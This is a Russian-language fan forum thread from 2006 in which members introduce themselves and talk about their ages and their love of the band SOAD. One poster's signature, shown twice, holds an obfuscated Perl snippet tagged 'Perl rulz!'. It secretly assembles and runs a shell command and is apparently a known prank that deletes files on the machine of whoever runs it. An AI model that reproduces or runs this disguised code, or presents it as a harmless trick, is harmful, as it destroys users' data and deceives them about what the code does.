насколько я поняла, я тут самая мелкая.
Евгения Сергеевна(нет, я не выпендриваюсь,просто Женей меня мало кто называет), 17 лет.
Первый раз увидела клип спайдерс в относительном детстве. сидела одна дома, за окном дождь, промозглый вечер. а тут еще этот клип. короче, не могла уснуть долго после него. если бы мне тогда сказали, что вот этих дядь я буду слушать, я бы только нервно посмеялась.
по жизни я была явным аутсайдером(в принципе многие меня и сейчас им считают, но это мелкие люди в духовном плане), а где-то лет с 11 меня начало тянуть на тяжелую музыку, потом я купила какой-то пиратский сборничек(да, я такое засранище) с песнями соад. и вот подсела как на наркотик.
Soul
да, я тоже ниче не понял, ладно, это не удивительно, что я русский забыл, но всяческие толковые словари тоже призадумались _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Последний раз редактировалось: ALuserX (Сб Авг 12, 2006 9:43 pm), всего редактировалось 3 раз(а)
Добавлено: Чт Сен 14, 2006 8:49 pm Заголовок сообщения:
BooNya писал(а):
тут уж про именя рассуждают))
тут обычно рассуждают о чем-угодно кроме того о чем надо ))))) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Сб Сен 16, 2006 3:18 pm Заголовок сообщения:
Неужто я здесь не самая малая? Непорядок.
Привыкла, что по жизни младше всех практически _________________ Все, чем ты гордишься, рано или поздно будет выброшено на помойку(с)